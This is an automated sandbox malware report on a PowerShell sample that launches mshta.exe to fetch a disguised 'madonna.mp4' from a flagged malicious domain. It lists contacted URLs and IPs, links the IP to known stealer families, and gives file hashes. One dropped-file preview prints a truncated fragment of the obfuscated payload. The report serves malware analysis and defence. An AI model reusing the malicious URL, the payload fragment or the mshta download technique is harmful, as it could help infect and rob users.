                                    https://pawpaws.readit-carfanatics.com/madonna.mp4...Fmshta.exe, 00000002.00000003.1779290701.000001C99EB09000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://crl.ver)svchost.exe, 00000003.00000002.2911938505.000001EB7740F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://pawpaws.readit-carfanatics.com/madonna.mp4oGmshta.exe, 00000002.00000002.1799903969.000001C19C7FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://pawpaws.readit-carfanatics.com/madonna.mp4(mshta.exe, 00000002.00000003.1790913512.000001C9A1D6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1792017935.000001C9A1D6E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1792131695.000001C9A1D70000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1773889837.0000000005427000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://pawpaws.readit-carfanatics.com/madonna.mp4-mshta.exe, 00000002.00000003.1792131695.000001C9A1D70000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000003.00000003.1711652478.000001EB77382000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.drfalse
                                          		high
                                          https://pawpaws.readit-carfanatics.com/madonna.mp4wmshta.exe, 00000002.00000002.1800030988.000001C19C818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798206246.000001C19C818000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://pawpaws.readit-carfanatics.com/madonna.mp4xmshta.exe, 00000002.00000003.1788000132.000001C9A3BD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://pawpaws.readit-carfanatics.com/madonna.mp4ROFILE_STRING=Imshta.exe, 00000002.00000002.1799754505.000001C19C7D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://aka.ms/pscore68powershell.exe, 00000000.00000002.1684443354.000001CD04A75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1738683834.0000018900001000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://pawpaws.Xpowershell.exe, 00000000.00000002.1684443354.000001CD04EF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://pawpaws.readit-carfanatics.com/madonna.mp4icmshta.exe, 00000002.00000002.1805106055.000001C99EA60000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://pawpaws.readit-carfanatics.com/madonna.mp4...mshta.exe, 00000002.00000002.1805106055.000001C99EA75000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://pawpaws.readit-carfanatics.com/madonna.mp4fEmshta.exe, 00000002.00000002.1799903969.000001C19C7FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            172.67.201.143
                                            		pawpaws.readit-carfanatics.comUnited States
                                            		13335CLOUDFLARENETUStrue

                                            Private

                                            IP
                                            127.0.0.1

                                            General Information

                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1580443
                                            Start date and time:2024-12-24 15:30:05 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 5m 9s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:12
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1
                                            renamed because original name is a hash value
                                            Original Sample Name: .ps1
                                            Detection:MAL
                                            Classification:mal80.evad.winPS1@11/14@2/2
                                            EGA Information:Failed
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 19
                                            • Number of non-executed functions: 10
                                            Cookbook Comments:
                                            • Found application associated with file extension: .ps1

                                            Warnings

                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                            • Excluded IPs from analysis (whitelisted): 184.28.90.27, 4.175.87.197, 13.107.246.63
                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target mshta.exe, PID 7560 because there are no executed function
                                            • Execution Graph export aborted for target powershell.exe, PID 7404 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 7752 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 7872 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • VT rate limit hit for: #U65b0#U5efa #U6587#U672c#U6587#U6863.ps1

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            09:31:00API Interceptor2x Sleep call for process: svchost.exe modified
                                            09:31:02API Interceptor32x Sleep call for process: powershell.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            CLOUDFLARENETUShttps://u48635528.ct.sendgrid.net/ls/click?upn=u001.9c3qucD-2BQzNTT0bmLRTJr37m0fhz0zdKJtvEO5GYL-2FheRuyVOh-2FQG4V3oBgBPYNynDxn_I1ksFJapfNmw0nKrksu71KTxdlg2CVrjzBUVofCtIEhaWkhL1Pph-2Ffg-2BCFbPvkCL9SX-2Fn-2BNBrku3RcjHS1atB8ladrmemt-2BtQU5680xhgoUl-2FmS0Bdj-2FOfednny-2F-2Bj2bwjjubeRvrpN0J7TGLD3CnNRzymiQOzypjCqxHhzmXtY2EWHJMJBxjl-2FHlyEIekWjEdTpTsRC8R5LaI-2BXF4kV8UeUtXxyFJLbYiR3fqcWt2evvBBECu9MeQj8TLZrmfuTf-2BJQraijp8-2BcIdxf8rnVxjHoJK1lo9-2Bkao444JbRSinVA-2FoUxeuAtdlrITU1Z6gHAn7DLZstY4XJkhkT16-2F2TN4CFt2LQ-2BEh9GWg4EPlocPi8ljTs-2B9D9RVbWdc3s2Vk2VPHSj20oCO3-2FalihBzGJuaYie5tnYaz6wBF3EqNzMXmVqRnMZwSYuGRwSMVhkchytYzt3hUH-2F51IUfn7nuhHUcUbdS8nBYneAMuB2eSDRn8IZzUkExLUascCVn8T9ImEyo0qhVsBPdJjfT9L3qli9clY1N-2BhQXDZgQnsN1Bs9PujeLzem37C62BvWnqPnqvXh5vbcvseiZwTP35DEJysw-3D-3D#mlyon@wc.comGet hashmaliciousHTMLPhisherBrowse
                                            • 104.17.25.14
                                            vce exam simulator 2.2.1 crackk.exeGet hashmaliciousLummaCBrowse
                                            • 104.21.33.227
                                            iUKUR1nUyD.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                            • 172.67.199.72
                                            j6ks0Fxu6t.exeGet hashmaliciousLummaCBrowse
                                            • 104.21.36.201
                                            wIgjKoo9iI.exeGet hashmaliciousLummaCBrowse
                                            • 104.21.36.201
                                            Canvas of Kings_N6xC-S2.exeGet hashmaliciousUnknownBrowse
                                            • 104.20.86.8
                                            Canvas of Kings_N6xC-S2.exeGet hashmaliciousUnknownBrowse
                                            • 104.20.86.8
                                            Audio02837498.htmlGet hashmaliciousHTMLPhisherBrowse
                                            • 104.17.25.14
                                            SW_48912.scr.exeGet hashmaliciousFormBookBrowse
                                            • 104.21.80.1
                                            cMTqzvmx9u.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                                            • 104.21.67.146

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            3b5074b1b5d032e5620f69f9f700ff0egYjK72gL17.exeGet hashmaliciousStealc, VidarBrowse
                                            • 172.67.201.143
                                            Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                            • 172.67.201.143
                                            Gq48hjKhZf.exeGet hashmaliciousLodaRATBrowse
                                            • 172.67.201.143
                                            Gq48hjKhZf.exeGet hashmaliciousUnknownBrowse
                                            • 172.67.201.143
                                            singl6.mp4.htaGet hashmaliciousLummaCBrowse
                                            • 172.67.201.143
                                            hnskdfgjgar22.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                            • 172.67.201.143
                                            Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                            • 172.67.201.143
                                            Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                            • 172.67.201.143
                                            WO.exeGet hashmaliciousMetasploitBrowse
                                            • 172.67.201.143
                                            ChoForgot.exeGet hashmaliciousVidarBrowse
                                            • 172.67.201.143
                                            37f463bf4616ecd445d4a1937da06e19T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                                            • 172.67.201.143
                                            Canvas of Kings_N6xC-S2.exeGet hashmaliciousUnknownBrowse
                                            • 172.67.201.143
                                            Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                            • 172.67.201.143
                                            installer.msiGet hashmaliciousUnknownBrowse
                                            • 172.67.201.143
                                            Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                            • 172.67.201.143
                                            Violated Heroine_91zbZ-1.exeGet hashmaliciousUnknownBrowse
                                            • 172.67.201.143
                                            3gPZmVbozD.msiGet hashmaliciousUnknownBrowse
                                            • 172.67.201.143
                                            fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                            • 172.67.201.143
                                            ChoForgot.exeGet hashmaliciousVidarBrowse
                                            • 172.67.201.143
                                            Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                            • 172.67.201.143

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                            Download File
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1310720
                                            Entropy (8bit):1.307352951978048
                                            Encrypted:false
                                            SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr2:KooCEYhgYEL0In
                                            MD5:D789D00B7928E66708609B89A82AA8AB
                                            SHA1:B01C87601F6EBB0D371B92AB9BC783C8BE9F3FA8
                                            SHA-256:8C91BD35B070F3663B84090F3E1137B5005AE73DD370185B67B6FFD7EC897F3C
                                            SHA-512:6221A7893F553D584C407ABD907148D8191ABED27F93EF72EA629E8F91E706317C9C92EBC6E8BEB17B71E3FCC5E295516611A26FC71049BF3C6F1A73ECE510A7
                                            Malicious:false
                                            Reputation:low
                                            Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                            Download File
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xd2dfb2c3, page size 16384, DirtyShutdown, Windows version 10.0
                                            Category:dropped
                                            Size (bytes):1310720
                                            Entropy (8bit):0.42212300337555064
                                            Encrypted:false
                                            SSDEEP:1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO
                                            MD5:7EAEB2885F1C645275B198AC234486AD
                                            SHA1:01F40B79D96F10451224D2CCAE54F228DC409229
                                            SHA-256:E1E1BBCD3FF2F55095FA8CE4B140DDED79EB5597F24C80147DB21879F7D73A05
                                            SHA-512:6FF42D8E387274CE8D8352176DCA1D3CB3C0B120DE630DC15EFE569019028D4064A9F98AAEA4DED561EA14C203DE9E0155A741FC99F457BFD37C7EE2855102C2
                                            Malicious:false
                                            Reputation:low
                                            Preview:...... .......A.......X\...;...{......................0.!..........{A......|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................](t......|....................GO.....|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                            Download File
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):16384
                                            Entropy (8bit):0.07580232782994088
                                            Encrypted:false
                                            SSDEEP:3:ds7XlKYeSALgv+Cejjn13a/apgvlqllcVO/lnlZMxZNQl:mXlKzpq+dj53qagQOewk
                                            MD5:55295C87F8F95D40B5DC5EE159F3B0F5
                                            SHA1:20C5B37BE6774E2D3C12FB93B91D2BCA6133C9BE
                                            SHA-256:426145C9B562BFAE00D232B6B3C2DDFFD09F4ECD67C979BE7ADA788689155255
                                            SHA-512:66E6A277A5FED29B92E2E2673D7787BC758D9C9AB57783F83A2FCAF3EDCC98EFAEC5285A072473D772C27764FC52233FE5EDDE18E14D8AA1D161D4FA81598EB8
                                            Malicious:false
                                            Preview:.m.M.....................................;...{.......|.......{A..............{A......{A..........{A]..................GO.....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\madonna[1].mp4

                                            Download File
                                            Process:C:\Windows\System32\mshta.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):537096
                                            Entropy (8bit):6.144478549534115
                                            Encrypted:false
                                            SSDEEP:6144:STqUnHtfxded6JPje7sepeIeu39D5HepxekV9IdeZ8ye6IexLT:S/nHd
                                            MD5:CE7AA8E9E4E4B562FF54D31F64A65B56
                                            SHA1:175499A184EC22CAE1F4E1F5ED2ACD57E2C261FD
                                            SHA-256:9E3B0BA2F842C94308FE713CE02DD30F59DC79EDAE447BC2E495B38258E86AE7
                                            SHA-512:51F0016168271873CF5B764111C6C46B724FB5AC5D844C7838D2C7571550C8015D7DF5A998F195E0A5F7BC7E765E492D25D83BD903AC5E0D5534516CB3B40861
                                            Malicious:false
                                            Preview:66v75c6eT63G74H69T6fj6eP20L6aX78k79X51v6aL74Z28E68O68E56c57v53w29R7bE76u61V72B20e67g61Q66j51q6aB71P3dO20k27x27L3bJ66b6fW72m20s28O76i61v72K20l57K49w61N47z66D20l3dY20i30d3bY57Z49l61G47p66D20y3cb20h68i68H56h57b53b2es6cE65d6eG67J74E68D3bV20z57K49P61U47j66D2bk2bn29Q7br76g61H72Z20m4fY48U4fh55i65t20n3dB20M53D74E72i69V6eU67v2ea66f72O6fd6da43D68a61a72r43V6fU64v65r28u68S68Q56A57U53B5bG57f49I61Y47b66K5dP20T2dm20G38K38l31O29i3bo67M61k66c51C6ag71W20M3dx20d67M61O66x51v6aH71u20n2bD20O4fT48O4fP55R65G7dn72T65K74j75n72T6eg20j67G61N66C51h6ah71n7dy3bn76f61u72h20f67M61M66N51T6aM71s20T3dH20W6au78T79Y51u6ad74o28j5bV39n39Y33e2cw39c39I32j2ct31a30M30z30F2ca39o38U32i2cm39u39a35G2cq39X39v36A2cZ39M38L35u2cd39m38D32y2cP39S38r39V2cD39i38j39E2cd39a32l37g2cT39B38v32G2cz31q30I30j31N2cd39e38Q32d2cd39X31Q33w2cp39P32n36I2cB31p30I30w30y2ce39E31K33W2cc39Q33l30P2cg39X31Q33F2cu39n32d36U2ck39m38n32b2cs39Z39K33T2cH39n31L33x2cX39S36L36n2cK39B39L31E2cZ39r39A35O2ce39N38x32A2cz39r39v36b2cK39o39Q37D2cV39U39F35E2ct39q38O36p2cE39n38r3

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1352
                                            Entropy (8bit):5.384205719576734
                                            Encrypted:false
                                            SSDEEP:24:3oWSKco4KmBs4RPT6GjKbmFoUebIKo+mZ9tXt/NK3R88bJ0yHrIS5cn:4WSU4y4RFymFoUeW+mZ9tlNWR83OMS6
                                            MD5:356A54A4A7055FC77512F403BB7FFCB3
                                            SHA1:C93F084D1CB5DB59A780E0A90E1C9EF5700AA525
                                            SHA-256:012C8DDCF134D696A147E268A444BEF1C581F6CED865550C09A4D8B4EA160E79
                                            SHA-512:C41175CC31396FEBB6092945FD81FB7838EDBEF7B559024C4090265E9EC237FA1EF26485E5E8B0EEB751AF32BBD2301661BB7432DA324CD102C86C04F24750DF
                                            Malicious:false
                                            Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gqsu1bu.3z3.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fuyaodov.tcj.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g3biex24.djn.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r1c3ofkg.fdl.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uvwo2av0.1eo.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zjjogfj2.15s.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):6221
                                            Entropy (8bit):3.7163347319501647
                                            Encrypted:false
                                            SSDEEP:96:K/4n33CxHvxkvhkvCCtwiaWiGBHjiaWiGBHj:K/4nyPtwit/itf
                                            MD5:78B52F3B7B5AF279F8517EB4DB0E9ABD
                                            SHA1:40868C05CF97EAB7F611308501BB8BBF8DE51AAE
                                            SHA-256:F15AA9ADA711A03A85DD4169A31C1F0E85E62A7921796A32E4F20E519623E857
                                            SHA-512:E951C4BC08F708E3804EE3A1B157ACC71B3CC43712321EC9CDF7E4DC4219A7F9031E390FEA3D40E3DAE8E6CB4BA559E204D861C9670DF864EF464B29ACC20D23
                                            Malicious:false
                                            Preview:...................................FL..................F.".. ...-/.v......Gq.V..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....yZzm.V....Sq.V......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.s...........................%..A.p.p.D.a.t.a...B.V.1......Y.s..Roaming.@......CW.^.Y.s..........................yiZ.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.s....Q...........

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6GWXKUUDNMNP7GYCD7IR.temp

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):6221
                                            Entropy (8bit):3.7163347319501647
                                            Encrypted:false
                                            SSDEEP:96:K/4n33CxHvxkvhkvCCtwiaWiGBHjiaWiGBHj:K/4nyPtwit/itf
                                            MD5:78B52F3B7B5AF279F8517EB4DB0E9ABD
                                            SHA1:40868C05CF97EAB7F611308501BB8BBF8DE51AAE
                                            SHA-256:F15AA9ADA711A03A85DD4169A31C1F0E85E62A7921796A32E4F20E519623E857
                                            SHA-512:E951C4BC08F708E3804EE3A1B157ACC71B3CC43712321EC9CDF7E4DC4219A7F9031E390FEA3D40E3DAE8E6CB4BA559E204D861C9670DF864EF464B29ACC20D23
                                            Malicious:false
                                            Preview:...................................FL..................F.".. ...-/.v......Gq.V..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....yZzm.V....Sq.V......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.s...........................%..A.p.p.D.a.t.a...B.V.1......Y.s..Roaming.@......CW.^.Y.s..........................yiZ.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.s....Q...........

                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                            Download File
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):55
                                            Entropy (8bit):4.306461250274409
                                            Encrypted:false
                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
